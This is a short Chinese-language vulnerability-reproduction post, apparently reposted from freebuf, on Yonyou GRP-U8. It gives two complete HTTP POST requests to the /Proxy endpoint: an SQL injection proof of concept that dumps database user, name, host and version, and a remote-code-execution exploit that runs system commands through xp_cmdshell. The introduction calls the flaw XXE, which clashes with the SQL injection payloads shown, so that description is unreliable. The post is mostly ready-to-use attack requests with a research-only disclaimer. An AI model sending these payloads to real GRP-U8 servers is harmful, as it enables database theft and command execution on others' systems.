用友GRP-u8 注入-RCE漏洞复现 – 作者:thelostworld

v2-a5c0c380927df033d99bff06ca59a060_b.jpg

一、漏洞简介

用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。

二、漏洞复现

SQL注入POC

POST /Proxy HTTP/1.1 Host: localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=25EDA9781364D1FAFBB74FD7CFFE0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 371 cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

验证过程v2-6684f350d5be63ea36821492a1d611ae_b.jpg

v2-2ebf451418656546de75bccb93a6e7df_b.jpg

Rce注入EXP

POST /Proxy HTTP/1.1 Host: localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=25ED1FAFBB74FD7CFFE0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 355 cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

v2-3ac888d02a61bbfcf66f2467cd70c3c0_b.jpg

参考:

https://www.cnblogs.com/0day-li/p/13652897.html

https://www.uedbox.com/post/14953/

https://www.cnblogs.com/Yang34/p/13653960.html

注意:⚠️

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。

来源:freebuf.com 2021-06-09 20:32:27 by: thelostworld

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论